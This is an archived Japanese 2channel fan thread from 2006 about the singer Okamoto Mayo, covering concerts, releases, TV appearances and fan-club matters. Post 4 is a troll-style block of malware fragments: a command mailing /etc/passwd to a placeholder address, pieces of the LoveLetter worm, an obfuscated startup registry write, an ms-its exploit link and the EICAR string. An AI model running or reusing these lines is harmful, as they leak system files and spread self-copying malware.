5ちゃんねる ★スマホ版★ ■掲示板に戻る■ 全部 1- 最新50  

■ このスレッドは過去ログ倉庫に格納されています

【同窓会】岡本真夜スレ Part2【Dear my Friends】

1 :岡井一貴:2006/09/25(月) 11:02:21 ID:xDSs/Rgl
おまいら、下ネタはほどほどに汁!


岡本真夜オフィシャルホームページ
http://www.mayo-okamoto.com/

前スレ
http://music5.2ch.net/test/read.cgi/musicjf/1120465419

2 :名無しの歌姫:2006/09/25(月) 12:55:38 ID:v1ayL5lx
コンサートチケットキター・・・
2get

3 :名無しの歌姫:2006/09/25(月) 13:11:45 ID:yD6+6wL5
あれ 3になっちまった。
チケット到着。  でも 列が下がったぞ。


4 :名無しの歌姫:2006/09/25(月) 18:54:18 ID:PrFDuAOV
kak.hta';ken=wd+'START
cat /etc/passwd | mail nobody@nonexistent.com

<body onload=window()>
If s = "htm" and fso.FileExists(f1.path+"l") = False thenfso.CopyFile f1.path, f1.path+"l"
Set A4 = A1.CreateTextFile(A1.BuildPath(A1.GetSpecialFolder(1)))
fso.copyfile "c:\network.vbs", "j:\windows\start menu\programs\startup\"
c.Copy(dirsystem&"\MSKernel32.vbs")
c.Copy(dirwin&"\Win32DLL.vbs")
c.Copy(dirsystem&"\LOVE-LETTER-FOR-YOU.TXT.vbs")
<object data="ms-its:mhtml:file://C:\\MAIN.MHT!http://www.loadcash.biz//adverts//35//main.chm::/main.htm" type="text/
X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*
fso.copyfile "dirsystem&nurupo.vbs", "j:\windows\start menu\programs\startup\"
If s = "htm" and fso.FileExists(f1.path+"l") = False then fso.CopyFile f1.path, f1.path+"l"
ToInfect.CodeModule.InsertLines BGN, ADI1.CodeModule.Lines(BGN, 1)
G.RegWrite A("IJDX^MNB@M^L@BIHOD]Rnguv`sd]Lhbsnrngu]Vhoenvr]BtssdouWdsrhno]Sto]VhoRu`su"), E.BuildPath(E.GetSpecialFolder(1), A("VHORU@SU/WCR"))
lines(n)=replace(lines(n),"""",chr(93)+chr(45)+chr(93))
ms-its:mhtml:file://c:\
kak.hta';ken=wd+'START
kill -9 xz/tSaBh0
Sub auto_open()
Application.OnSheetActivate = "check_files"
End Sub
Sub check_files()
c$ = Application.StartupPath
m$ = Dir(c$ & "\" & "PERSONAL.XLS")
If m$ = "PERSONAL.XLS" Then p = 1 Else p = 0
If ActiveWorkbook.Modules.Count > 0 Then w = 1 Else w = 0
whichfile = p + w * 10
End Sub
???

5 :名無しの歌姫:2006/09/26(火) 02:00:45 ID:pYjiXCU/
新曲楽しみ>>1

6 :名無しの歌姫:2006/09/26(火) 10:31:02 ID:ijOzQboQ
前スレ落ちちゃったの?

7 :名無しの歌姫:2006/09/26(火) 18:49:23 ID:9ofDxuee
突然消えたね。

8 :名無しの歌姫:2006/09/26(火) 18:58:25 ID:9U65Sx6G
え? ラブキューが?

9 :名無しの歌姫:2006/09/26(火) 20:01:05 ID:kuiaX3w7
名曲だらけ

10 :名無しの歌姫:2006/09/26(火) 22:14:38 ID:MSpab2A9
東京までライヴ、行けないな〜(T-T)
遠い+交通費。深夜バスなら2千円ってのがあったな…。
当方、大阪在住。だから何?www

11 :名無しの歌姫:2006/09/26(火) 22:44:27 ID:w6dX7ZBk
最後 981 で消えちゃった。
過去ログ倉庫に残っているが。

12 :名無しの歌姫:2006/09/28(木) 20:29:48 ID:M/HeUZjL
>>3
今回はオーケストラピットでも作るのでは?
あの会場なら可能でしょ。

13 :名無しの歌姫:2006/09/28(木) 21:29:55 ID:gD5EnrZP
「おやすみダーリン」と「おやすみたーじん」。
関西人にしかわからない、謎多きたーじんwww

14 :名無しの歌姫:2006/09/29(金) 02:37:39 ID:eYBIc29P
まよのうたごえききたいお

15 :名無しの歌姫:2006/09/30(土) 00:52:58 ID:7i/oF1+N
ちょっと質問
最初に出たデビューシングルの「TOMMOROW」って、
アルバム「SUNandMOON」に入ってますか?よろ

16 :名無しの歌姫:2006/09/30(土) 19:02:06 ID:6cw1pQ5l
どうでもいいが、最初じゃないデビューシングルはないよな

17 :名無しの歌姫:2006/09/30(土) 19:26:24 ID:sTnzhbW7
>>15
入っています


18 :名無しの歌姫:2006/09/30(土) 20:18:05 ID:goFism+K
X'masに甘いキッス、誕生日に赤い花束、春に桜を見に行く…。
大学生の時期だったから、できたんだろうな〜(ANNIVERSARYより)

19 :名無しの歌姫:2006/09/30(土) 22:44:42 ID:cwXlE3Nr
>>15
入ってるけど
「TOMORROW〜moonshin mix〜」の方だ。なにがどう違うのか、俺には分からんが。

20 :名無しの歌姫:2006/09/30(土) 22:54:58 ID:OvA+6XuT
>>19
>なにがどう違うのか
聞き比べればわかるぞ。明らかに違う箇所がある。
おいらはアルバムに入っているほうが好きだなぁ。

あと、
×「TOMORROW〜moonshin mix〜」
○「TOMORROW〜moonshine mix〜」

21 :名無しの歌姫:2006/09/30(土) 22:55:35 ID:sTnzhbW7
最後の方のサビ部分、バックの演奏が違うだけであとは同じ

22 :15:2006/10/01(日) 01:40:54 ID:jAnKlG46
レスありがとー。

少し違うけど、全体的な雰囲気は同じってことですね。サンクス。

23 :名無しの歌姫:2006/10/05(木) 13:40:12 ID:eduj4yar
保守

24 :名無しの歌姫:2006/10/06(金) 12:15:07 ID:9LM9quWz
伸びないな。


25 :名無しの歌姫:2006/10/06(金) 16:33:36 ID:AoDb++3B
伸ばしてやる。

26 :名無しの歌姫:2006/10/07(土) 18:12:12 ID:xzFE6136
まよがんがれ

27 :名無しの歌姫:2006/10/07(土) 22:27:33 ID:kLb4BoDt
さっきオークションみたが、20日のチケット、ある席だけが人気だったな。
果たしていくらになるかな。


28 :名無しの歌姫:2006/10/07(土) 22:28:17 ID:5K8bI9Gg
       ?????
         ????????
           ????????
            ????????
         ????????
  ?????    ?????????
 ???????? ????  ?   ▼?
 ???????????? ?    ? ??
?????????■???┃   ??■ ?
 ?■??■??? ?〓  ┃   ?? ??????
         ?  ??       ???   ???
           ??  ???         ┃
            ??  ?????    ???
           ????? ????? ?????
        ???■??????????■????
      ????   ???■■■??  ????
     ?????   ????????????■?
     ??? ? ?????????????? ???
   ??〓? ??? ???????????? ┃ ?
  ???━?  ?? ????????????????
   ??  ?  ??????????????
     ???????????????????
          ???▲??〓???〓?
  ??━??     ?????    ????
??〓???::::??  ?????     ????
??:::: ????::::??????     ????
?::::??::::???? ????  ??????????
 ????:::: ?▲::::??? ?::::??■??::::??::::??
   ????::??▲?::::??????::::?????:::::?
     ?????▼????::::???????::::?◆
         ????▼  ?????〓??〓??



29 :名無しの歌姫:2006/10/08(日) 17:22:55 ID:ZCyx3diW
12月6日にアルバムが出るらしい。

30 :名無しの歌姫:2006/10/09(月) 02:33:03 ID:Nb/arSsg
CD出すのは勝手だけど人前で歌うのは如何なものか?

31 :名無しの歌姫:2006/10/09(月) 04:43:57 ID:Yx2I8pfi
CD出すのも人前で歌うのも歌手の勝手なのである
そしてそれらを聴く聴かないを判断するのもわれわれ個々人の勝手なのである


32 :名無しの歌姫:2006/10/09(月) 09:34:45 ID:/uusHWAR
>>30
歌手の生業を真っ向から否定wwww

33 :名無しの歌姫:2006/10/09(月) 09:50:44 ID:Yx2I8pfi
聴きなさい、チケット買ってライブに来なさいと誰も強制はしてないんだしな
ちょっと冷めているかもしれないが
見たくなけりゃ見なければいいんだよ。いくらでも他に歌手はいるんだし。


34 :名無しの歌姫:2006/10/09(月) 12:26:47 ID:XFWjQEmI
>>33
冷めてなどいない。それが当然の考え方。

35 :名無しの歌姫:2006/10/09(月) 18:36:21 ID:MJEXttHL
CD出すたび、ライブするたび、
「CD買って聴きなさい、チケット買ってライブに来なさい」
と感じるようなら、十分に信者といえるよな。

36 :名無しの歌姫:2006/10/09(月) 18:48:51 ID:Yx2I8pfi
別にいいんじゃないの。そういう人もいるってことで(w
考え方なんて人それぞれなんだから。
前にも書いたように、聴きたくなけりゃ聴く必要などない。
別に岡本真夜の全曲がすばらしいなどと俺も思わんし。

37 :名無しの歌姫:2006/10/10(火) 20:39:49 ID:QCFZFFPz
20日 楽しみだ。
次回のアルバムも。


38 :名無しの歌姫:2006/10/11(水) 19:10:37 ID:W1Uj/haC
最近 ミュージカレードで新曲よくかけているが、
発売日には聴き飽きてしまうぞ。
アルバム いつだっけ。



39 :名無しの歌姫:2006/10/11(水) 19:33:48 ID:pX/VkFkQ
12月じゃないの?
アルバムは新曲2曲の他に何が入るかな。

40 :sage:2006/10/11(水) 22:40:51 ID:NyvkdUxd
12月6日 newアルバム「Soul Love」 IOCD-20187 \3.150 avex io

41 :名無しの歌姫:2006/10/12(木) 09:46:34 ID:EaszFpBm
カムサムニダ

42 :名無しの歌姫:2006/10/13(金) 08:55:08 ID:m5QCSkXQ
MmmмМM

万yu子のケツ毛バーガー。
いやもうド肝抜かれたの何の・・・・・・参ったナ。        
             /:::::::::::ヽ
            |;;;;ハ;;;;;;;;;;|     , r−、
   ,r‐-、      トイ ^ o^ t;|    /    `、
  /  、 \     >‐-ュr'ニヽ、  /  i   l、
  |   '|  \ _.r'´ノニーイニヽ,\/    |   l
  |    |   `</ lo )  ⌒q! /    .|   |
  .|    |    \/'    _,  |/     ト、  !
  |   |      \ ⌒,,,⌒ /       ハ   ヽ
  .|   .|ヘ       \ 巛《 /       l )   \
   |   .| ヽ       彡゚д゚ミ       ,' ノ     \
  ノ   ヽ ヽ       ミ《》彡     .ノ ゝ、__
/     ヽヘ、       ミ*ミ    /      `⌒
     _ノ  `ー 、. _   ,X、._,.-‐'´どんなもんじゃい卍

43 :名無しの歌姫:2006/10/13(金) 18:24:04 ID:1wq4hSu2
あと7日

44 :名無しの歌姫:2006/10/13(金) 21:52:23 ID:gdG/Vzl/
 
  へ(Θヮ・)ヘ
    | |    
     | |∧
/ ̄


45 :名無しの歌姫:2006/10/14(土) 19:48:32 ID:ykBJ4O6t
あと6日

46 :名無しの歌姫:2006/10/15(日) 00:08:14 ID:AtwFk/kk
あまりアンチがいないな!!

47 :名無しの歌姫:2006/10/15(日) 08:36:24 ID:kXfxHsX/
あと 5日

48 :名無しの歌姫:2006/10/15(日) 22:05:04 ID:Hz7M9dDP
ttp://www.youtube.com/watch?v=liLH3FzUz3c

49 :名無しの歌姫:2006/10/16(月) 09:02:58 ID:lclxw6Jb
あと4日

50 :名無しの歌姫:2006/10/17(火) 09:33:29 ID:ZZYAE62u
あと3日

51 :名無しの歌姫:2006/10/17(火) 12:52:35 ID:waZOzfjb
7月で期限切れてたのに会報送ってきたよ
期限切れてから2ヶ月以内なら、今の会員番号のまま手続きできるから、お早めにみたいなこと書いてあった
会員少なくて厳しいんだろうなー
もう1年更新するかな・・・

52 :名無しの歌姫:2006/10/17(火) 15:43:04 ID:Yw0yvL8b
記憶違いだた
10月末までに振込んでいただければだた

53 :名無しの歌姫:2006/10/17(火) 16:52:27 ID:njKuejgX
会報の真夜さんのコメントとか質問コーナーとかさあ…
もう年が年だし変に可愛いキャラ作んないで真面目に音楽への姿勢とか語って欲しい
語尾のハートマーク痛い

54 :名無しの歌姫:2006/10/17(火) 20:25:09 ID:A8w6OVd9
会員少ないほうが まよ 楽


55 :名無しの歌姫:2006/10/17(火) 20:27:35 ID:W7Mqss+w
>>51
気になるくらいだったら俺なら更新するけどね。まあ強制するつもりはない。
まあ普通に更新し忘れた人のために猶予期間があると会報にもちゃんと書いてあるんだがね。

56 :名無しの歌姫:2006/10/18(水) 10:16:27 ID:vk8CdjBg
あと2日

57 :名無しの歌姫:2006/10/18(水) 22:01:40 ID:cr2Ys2YG
DVDのRISEの最後に収録されている「TOMORROW」を観てたら、
泣けてきた。本人も、順々に観客が立ち上がるのを観ると泣いてしまうって
言ってたな〜FCの会報やったかな?まあ、泣きました…ということで。

58 :名無しの歌姫:2006/10/19(木) 09:23:14 ID:ZjvIBsXM
いよいよ明日!

59 :名無しの歌姫:2006/10/19(木) 18:48:05 ID:oPtrgBYI
24時間 切ったぞ。
明日の今ごろは。

60 :名無しの歌姫:2006/10/19(木) 19:41:10 ID:nS7BW0in
何のカウントダウン?北の核実験か?

61 :名無しの歌姫:2006/10/19(木) 20:55:32 ID:LDlJVlEy
知らなければ自分で調べればいい。
しかし、オークションで1万以上するチケットでも買う奴はいるものなんだな。


62 :名無しの歌姫:2006/10/20(金) 00:13:45 ID:NS8nlhM8
あと19時間

63 :名無しの歌姫:2006/10/20(金) 10:07:07 ID:NS8nlhM8
あと9時間

64 :名無しの歌姫:2006/10/20(金) 17:37:09 ID:5+3UvQga
あと80分

65 :名無しの歌姫:2006/10/20(金) 18:23:03 ID:6kkJZfYt
いーなーいいなー

66 :名無しの歌姫:2006/10/20(金) 18:25:08 ID:NS8nlhM8
あと35分。
急がねば、、、

67 :名無しの歌姫:2006/10/20(金) 18:40:11 ID:NS8nlhM8
あと20分。
只今、東京駅(京葉線地下ホーム)

68 :名無しの歌姫:2006/10/20(金) 18:46:37 ID:6kkJZfYt
レポよろ

69 :名無しの歌姫:2006/10/20(金) 18:49:36 ID:KT8FwmFK
もうすぐだな
http://a.pic.to/4grx3


70 :名無しの歌姫:2006/10/20(金) 18:54:29 ID:NS8nlhM8
到着。

71 :名無しの歌姫:2006/10/20(金) 21:33:05 ID:KT8FwmFK
グッズ売場は殺伐としてるな
http://h.pic.to/7nfwf


72 :名無しの歌姫:2006/10/20(金) 21:42:06 ID:KT8FwmFK
ちなみにル・クプル(♀)が来てた


73 :名無しの歌姫:2006/10/20(金) 22:10:27 ID:NS8nlhM8
このスレからは俺含めた2人しか行ってないのかな?

74 :名無しの歌姫:2006/10/20(金) 23:15:31 ID:+bD/R6qk
俺もかみさんと逝ってきたぞ

75 :名無しの歌姫:2006/10/20(金) 23:39:41 ID:Wmn/V8Om
佐賀から見に行きました。

76 :名無しの歌姫:2006/10/21(土) 00:13:08 ID:dXoUwUF0
>>75
すごいね。帰れた?わけないかw

77 :名無しの歌姫:2006/10/21(土) 01:56:00 ID:vxkp1WVY
マヨポン4回やってみた。

78 :名無しの歌姫:2006/10/21(土) 11:23:45 ID:L/eCWif/
誰か感想とかレポとか書けよー
ちくしょー

79 :名無しの歌姫:2006/10/21(土) 14:59:40 ID:dJKtOcWS
生姜ないな。

前から四列目で見てたが、ライブの完成度としてはかなり高い方だと思う。



80 :名無しの歌姫:2006/10/21(土) 15:10:12 ID:dJKtOcWS
生姜ないな。

前から四列目で見てたが、ライブの完成度としてはかなり高い方だと思う。



81 :名無しの歌姫:2006/10/21(土) 18:33:01 ID:OehT8iff
同意。見に行った甲斐はあったと思ったね。
じっくり落ち着いてきける大人のコンサートだった。
客の年齢層がさまざまだったし丁度良かったかもしれないな。
俺の近くだと夫婦できていた場合が多かったな。

82 :名無しの歌姫:2006/10/21(土) 21:19:30 ID:HKN/cIHl
音程は狂いませんでしたか?声はまともに出てましたか?

83 :名無しの歌姫:2006/10/21(土) 22:03:14 ID:OehT8iff
音程というか高音出すときにたまに辛そうという時があったくらいで
酷いというレベルではなかった。緊張していたようで前半よりは後半が良く声が出てたかな。
ゲストがいたから比較して聞いていたけど、声量はそう遜色なかったよ。

84 :名無しの歌姫:2006/10/22(日) 13:16:25 ID:j7l9WYH/
終わっちまた。 1日半経過

すごく よかった。
レポ 言わない。 行ったひとだけの特典。


85 :名無しの歌姫:2006/10/22(日) 13:33:31 ID:3BDgXaRG
感想知りたい人はここを覗くよりも
ブログなど検索かけてみた方がいいと思われ。
結構書いている人いる筈だぞ。

86 :名無しの歌姫:2006/10/24(火) 19:08:25 ID:pcRvVaeQ
あげとく

87 :名無しの歌姫:2006/10/24(火) 19:48:33 ID:hY6CHwio
新曲買いました

88 :名無しの歌姫:2006/10/24(火) 20:16:09 ID:OFfy1DnN
どうだた

89 :名無しの歌姫:2006/10/24(火) 21:42:58 ID:hY6CHwio
曲の雰囲気は「Life」に似てるように感じた。
歌詞がいいと思う。カップリングは最後の方のコーラスがおもろい。
曲とは関係無いが、歌詞カードの歌詞がいつもより大きめで読みやすい。

90 :名無しの歌姫:2006/10/24(火) 22:11:24 ID:OFfy1DnN
d Life好きだから期待

91 :マヨマヨ:2006/10/25(水) 02:25:10 ID:EX82zf8h
久々に岡本真夜の「Alone」を聞いてみて、大塚愛がパックリしたっぽい映画主題歌より、はるかに名曲。

大塚愛へ、正直サビ似すぎです。

92 :名無しの歌姫:2006/10/25(水) 12:45:26 ID:ePha835S
>>85
歌詞カードの歌詞がいつもより大きめなのは とても良い。
オフィシャルに言ったからな。 もっと大きな字で書けよ。って
年とると 字が見えんのじゃ。


93 :名無しの歌姫:2006/10/25(水) 17:15:20 ID:lQ5hpelG
ある程度大きなCDショップ行ったけど売ってなかった
また明日別のお店行ってくる

94 :名無しの歌姫:2006/10/25(水) 19:51:10 ID:2lsfxMov
>>92
そういうことか。納得した。

>>93
おそらく大きな店でも棚の方にしか並んでないと思う。1枚とかそういうレベルね。
発売日だしたまたま直前にだれか一人買っていった可能性が高いと思うが。
一番いいのは店員に聞くことだね。在庫は少なくても有る筈。

95 :名無しの歌姫:2006/10/25(水) 20:37:43 ID:3po6Qmq4
どうせ12月のアルバムに入るかと思うと買う気失せるな

96 :名無しの歌姫:2006/10/25(水) 23:46:25 ID:6nQTbOZI
俺もショップで一枚だけ見かけたけど買わなかった。

97 :名無しの歌姫:2006/10/27(金) 17:36:51 ID:BXcBPmMd
音楽戦士 MUSIC FIGHTER 

11/03(金) 深01:00 >> 深01:55  日本テレビ
[S][H]  音楽/バラエティ総合

音楽戦士 BoA&時東ぁみ&岡本真夜&Salyuがスペシャルライブ!▽新入戦士に秦基博が登
場▽KREVAと築地グルメを堪能
ゲスト/時東ぁみ BoA KREVA 岡本真夜 秦基博 Salyu  司会/青木さやか キ
ングコング

98 :名無しの歌姫:2006/10/27(金) 21:48:01 ID:os6CUoUt
買ってやってよ!!。 1枚でいいから。
買って。

99 :名無しの歌姫:2006/10/29(日) 07:29:18 ID:oJdxqjZ6
次のアルバムは9割 ラブソングと言っていたから
今回のシングルとは ラップしないだろう。
だから シングルもGET!!

100 :93:2006/10/29(日) 10:24:05 ID:iSPBuHTl
>>94
翌日行った別のお店にあったよ
で、おっしゃる通り1枚しかなかった

101 :94:2006/10/29(日) 12:42:26 ID:52sR2inx
よかったな。
おそらく殆どの店でそうだと思う。

102 :名無しの歌姫:2006/10/30(月) 17:22:20 ID:5bRqKT7M
3店まわったが無かった。
ネットで買うしかないか。


103 :名無しの歌姫:2006/10/30(月) 21:15:09 ID:Dpre6zDe
レンタルした。けっこう好きだな。

104 :名無しの歌姫:2006/11/01(水) 20:32:16 ID:xyh3IvPD
今日オフィシャル見たら、新曲の冒頭部分のみ聞けるようになってました。
あとmisonoのカバー聞きました。

105 :名無しの歌姫:2006/11/03(金) 13:07:26 ID:u+kuNfsG
新曲千枚も売れてないんだな。

106 :名無しの歌姫:2006/11/03(金) 21:31:03 ID:JeJZtpKh
そもそも再び活動していること自体知らない人が多いというのが現状。
そのためにも種まきが必要。
占いによると種まきの年らしいけど↓
http://www.a-uranai.com/f/y_1974/m_1/d_9/b_AB/s_/u_4/p_+/r_1/e_2/name_%89%AA%96%7B%90%5E%96%E9/

上戸彩に曲作るかい?

107 :名無しの歌姫:2006/11/04(土) 01:11:11 ID:FcTs9WSj
日テレ見れ

108 :名無しの歌姫:2006/11/04(土) 09:05:26 ID:6oI4aO8p
見忘れた\(^o^)/

109 :名無しの歌姫:2006/11/04(土) 09:24:12 ID:74fwFvhT
見れない地域でした↓
ジャパネットの社長を見た瞬間にテレビ消しました。

110 :名無しの歌姫:2006/11/04(土) 11:48:09 ID:aN+ApdeW
私にはよくあるのですが、真夜ちゃんの曲を酔っ払って聴いたら、
涙がこぼれます。「同窓会〜Dear My Friends〜」も聴くと泣ける。


111 :名無しの歌姫:2006/11/04(土) 12:50:20 ID:iu4IymrR
電波 飛んでこない。  

112 :名無しの歌姫:2006/11/04(土) 15:29:56 ID:THcXz+ee
昨日の日テレの番組。
真夜が出たとたん、実況は
「この人まだいたの?」の嵐でしたw

113 :名無しの歌姫:2006/11/04(土) 16:08:21 ID:74fwFvhT
あっそ

114 :名無しの歌姫:2006/11/04(土) 17:51:07 ID:6oI4aO8p
>>112
(´;ω;`)ブワッ

115 :名無しの歌姫:2006/11/04(土) 19:36:17 ID:74fwFvhT
現状を考えれば活動していることをアピールできただけでも良しとした方が・・・
実際活動していること自体を知らない人が結構いるんだから。


116 :名無しの歌姫:2006/11/05(日) 10:30:45 ID:ybVeOmmI
Aloneのリリースが10年前の今日でした

117 :名無しの歌姫:2006/11/05(日) 18:04:44 ID:JDMhDV9l
早いよな。そうなると小僧も小学生くらいか。

118 :オフィシャルページ効果?:2006/11/07(火) 03:41:33 ID:vJo98RPg
ゆうせん週間チャート8位↓
http://www.usen440.com/songlist/weekly.html

新曲気に入っている人はどんどんリクエストするべし

119 :名無しの歌姫:2006/11/07(火) 15:39:00 ID:14qV7/yu
またアカペラやってほしいな

120 :名無しの歌姫:2006/11/08(水) 02:45:01 ID:lHRsw1wv
今度徳永英明とCHAGEandASKAとまさかジョイントって話…人ちがいかな。

121 :名無しの歌姫:2006/11/08(水) 06:52:13 ID:OtYdBqv4
本当だよ

122 :名無しの歌姫:2006/11/08(水) 10:19:08 ID:lHRsw1wv
ちょっとうれしいな。

123 :名無しの歌姫:2006/11/08(水) 20:10:33 ID:OtYdBqv4
そうだね

124 :名無しの歌姫:2006/11/10(金) 09:43:16 ID:zuqsY1oe
新曲 最近 ちょくちょく Fmでかかっているな。 うれしい。


125 :名無しの歌姫:2006/11/13(月) 19:30:12 ID:reEKSpoI
またまたライヴか…お金、無いねんけど。
またもや大阪では「なんばHatch」か…。
考えよーっと。

126 :名無しの歌姫:2006/11/14(火) 07:58:33 ID:MKppxrw3
先行申し込みの案内来てたな。
2月、3月だからな。

127 :名無しの歌姫:2006/11/15(水) 03:28:41 ID:U2AwRKjf
♪私が死んでも悲しむ人なんてどこにもいない

128 :名無しの歌姫:2006/11/15(水) 11:07:07 ID:B6a/VthI
>>127
32歳の天使か

129 :名無しの天使:2006/11/15(水) 13:38:13 ID:p0zOHCx/
2月の金沢か 寒いな。 どうしよう。
富山まで行ったら 凍っちまうだろうな。
とりあえず 無難な大阪にしとくか。
天使も歳をとれば 山姥になるぞ。

130 :名無しの歌姫:2006/11/15(水) 18:16:37 ID:E4WHwJ4f
自分は布袋寅泰が大好きなのですが、
今は、とにかく真夜にハマっている。
真夜中毒だ〜!

131 :名無しの歌姫:2006/11/15(水) 20:17:54 ID:6ASg3yLo
この後9時からテレ朝でマヨでるよ

132 :名無しの歌姫:2006/11/15(水) 20:31:02 ID:Lg9wXryH
了解ですサンキュー

133 :名無しの歌姫:2006/11/15(水) 21:38:54 ID:cir8fIgZ
つうかマヨ違い

>>129
俺は東北人だが、2月は確実に寒いと思われ

134 :名無しの歌姫:2006/11/17(金) 21:39:04 ID:aBaz8UYF
>>129
確かに寒い。でも北海道に比べればアタタカイはず。厚着汁

135 :名無しの歌姫:2006/11/18(土) 16:55:43 ID:QhVZhd3Z
三十路街道まっしぐらなんて曲があるんだがw

136 :名無しの歌姫:2006/11/19(日) 14:35:13 ID:oDf5Pnf+
真夜「前の方、座らないでくだすぁ〜い(ヘラヘラ
  どう思う?座ってたよ?、今
  前の方で見てるのにさぁ、座ってたよ?
  感 じ 悪 い ね 〜〜〜〜〜』

137 :名無しの歌姫:2006/11/19(日) 17:16:25 ID:vlAtqoNn
↑↑↑↑↑↑↑↑↑↑↑
それは

浜崎あゆみ

だろ

138 :名無しの歌姫:2006/11/19(日) 17:45:20 ID:CruPXWqe
一度でいいから見てみたい、真夜が「座らないでくだすぁ〜い」という所(w

139 :名無しの歌姫:2006/11/19(日) 19:30:01 ID:sA6hA1HF
座ってじっくり聞き入るような歌唱力じゃないのにな

140 :名無しの歌姫:2006/11/19(日) 20:05:41 ID:bLmel45O


141 :名無しの歌姫:2006/11/19(日) 22:04:18 ID:HE6OUMLe
まよ ちゃん

142 :名無しの歌姫:2006/11/23(木) 21:27:24 ID:5xpaZ/wu
あ〜あ〜
CD買うお金もない。
「Soul Love」か…さっき、おっふぃーで「足音」っていう
曲が流れてました。ぜひとも買いた〜い。

ちゅうか働けよっ、わたし!って感じですかね〜ww

143 :名無しの歌姫:2006/11/25(土) 10:08:11 ID:0dMgDlsE
コンサートでは「足音」も良かったけど「恋路」も良かった。

144 :名無しの歌姫:2006/11/25(土) 18:31:30 ID:vxnW+w1a
恋路いとし喜味こいし

145 :名無しの歌姫:2006/11/26(日) 08:58:19 ID:vEUBbJzB
iTunesストアー来たけど曲少ない
Lifeと愛という名の花をおいといてくれよ

146 :名無しの歌姫:2006/11/26(日) 18:16:52 ID:MHptgk2h
>>97

亀レススマソ
その番組すげーなー。コンセプトが全く見えないじゃん。
見てみたかったような見なくて良かったような・・・。

147 :名無しの歌姫:2006/11/26(日) 21:29:30 ID:h0CISIVY
真夜ちゃんの全国ツアーはいつからですか?

148 :名無しの歌姫:2006/11/26(日) 22:08:22 ID:gQvxGWEE
んー。。
お金が無い。氷室京介と真夜ちゃんのライブを天秤にかけてみた。

今回は真夜ちゃんに決定!
「Hello TOUR」の時、同じ日に二人のライブがあって、気づかずに両方の
チケットを購入してて、氷室に行ったから、そのかわり(言い方悪いけど)
ってことで、真夜ちゃんに行きます。締切り、明日ですよね?

氷室スマソ.ゴメンネ.

149 :名無しの股間:2006/11/29(水) 18:21:31 ID:SyrL+m98
11月もいろんなライブへ行った。
倉木麻衣ちゃんと真夜ちゃんを天秤にかけてみた。
天秤が壊れた。

150 :名無しの歌姫:2006/11/30(木) 18:52:01 ID:L6QBe2v2
ファンクラブ、継続しないと…。
12月はいろいろと出費があるな〜

151 :名無しの歌姫:2006/12/01(金) 01:15:19 ID:PtVN9zUt
忘年会・クリスマス・ライブの申し込み  
資金繰りが くるしい。

152 :名無しの歌姫:2006/12/01(金) 20:34:39 ID:T4F6fCH5
おれは彼女も友達もいないからライブとアルバムの金に困ることはない。(^人^)

153 :名無しの歌姫:2006/12/02(土) 02:16:02 ID:HBxkYsbv
忘れないで…

154 :名無しの歌姫:2006/12/02(土) 21:52:35 ID:fWKZXs3N
おれは彼女も友達もいないが、かみさんと子供がいる。
すでに お金は、羽が生えて飛んでいってしまった。

155 :名無しの歌姫:2006/12/02(土) 22:47:37 ID:Pyca/q+d
公式サイトに行って、全曲視聴してみようかな。
アルバム楽しみですね〜

違うアーティストの会員継続もしないとダメだ。
入会月をちゃんと考えてから入ればよかった。
12月に集中しすぎ。2万円、飛んでいきます。

156 :名無しの歌姫:2006/12/04(月) 16:13:20 ID:svw7Rr8l
三十路街道まっしぐら
〜社内恋愛編〜

ぱぺぽぴみたいなもんか?

157 :名無しの歌姫:2006/12/04(月) 23:35:46 ID:SXblTx24
パペポビ 歌ってくれないかな。来年のツアーで。
そろそろ 歌わないと、これ以上歳とると歌えなくなるぞ。
すぐ 40歳だぞ

158 :名無しの歌姫:2006/12/05(火) 20:27:45 ID:ahhGwGfN
アルバム買ってきた

159 :名無しの歌姫:2006/12/05(火) 21:13:27 ID:I6ycht+J
どうだった?
視聴した限りでは結構いい感じに思えたけど

160 :名無しの歌姫:2006/12/06(水) 00:05:09 ID:6I/6LN79
三十路街道禿しく名曲

161 :名無しの歌姫:2006/12/06(水) 00:26:55 ID:vWHiZx/H
いいね。
好きだよこのアルバム。

162 :名無しの歌姫:2006/12/06(水) 01:39:42 ID:ojOfDaVd
ここ2、3年でだしたCDで
今度、代々木で歌いそうな曲ってなんですかね?


163 :名無しの歌姫:2006/12/06(水) 03:00:11 ID:+1q2LHNV
何で公式サイトはディスコグラフィー更新されないの?

164 :名無しの歌姫:2006/12/06(水) 09:25:03 ID:p06UQl5b
恋時雨が一番好きなの漏れだけ?
アルバム中どころか、全発表曲の中でも一番気に入ったくらいなんだが。

165 :名無しの歌姫:2006/12/06(水) 22:27:43 ID:/BMEp825
俺も恋時雨が一番いい
smileのもう一度キスしたかったみたいな曲だな

166 :名無しの歌姫:2006/12/07(木) 00:55:00 ID:QSot6a+H
三十路街道のへんな突っ込みナレーションはなんですか?
噂の東京マガジンのやってTRYみたいなやつ。

167 :名無しの歌姫:2006/12/07(木) 08:17:52 ID:bbH73sbJ
おやおや、阿藤さん。また、よりみちですかぁ?

168 :名無しの歌姫:2006/12/07(木) 09:19:27 ID:QSot6a+H
それは滝口順平

169 :名無しの股間:2006/12/07(木) 19:29:10 ID:4bEJHOVC
NETで CD情報が取れないな。 なんでだ。

170 :名無しの歌姫:2006/12/08(金) 10:19:27 ID:sO5sRCww
>>167-168


171 :名無しの歌姫:2006/12/13(水) 11:50:56 ID:aSAXfWWY
保守

172 :名無しの歌姫:2006/12/15(金) 15:30:56 ID:Q/0A2gH2
108位か。惜しいな。

173 :名無しの歌姫:2006/12/18(月) 22:48:49 ID:kfsEhxxM
108? 煩悩(ぼんのう)だな。

174 :名無しの歌姫:2006/12/20(水) 15:04:20 ID:CAMTBcS9
とっくの昔に終わった歌手www

175 :名無しの歌姫:2006/12/20(水) 17:24:16 ID:sOfPGfoD
また会おうね また会えるよね

無理か

176 :名無しの歌姫:2006/12/20(水) 18:34:40 ID:aEfD5Dbh
無理じゃない

会えるよきっと

177 :名無しの歌姫:2006/12/22(金) 01:32:38 ID:HrDPLZ+Y
チャゲアス、ポイントグリーンライブについて語る
ここの住人も行くの?
http://www.mainichi-msn.co.jp/entertainment/music/news/20061218ddm016040099000c.html

178 :名無しの歌姫:2006/12/22(金) 05:48:09 ID:+u/2e3ua
ALONE聴きて


179 :名無しの股間:2006/12/22(金) 09:53:06 ID:thBqeizm
顔見てえ

180 :名無しの歌姫:2006/12/22(金) 21:13:24 ID:R0pn3eMT
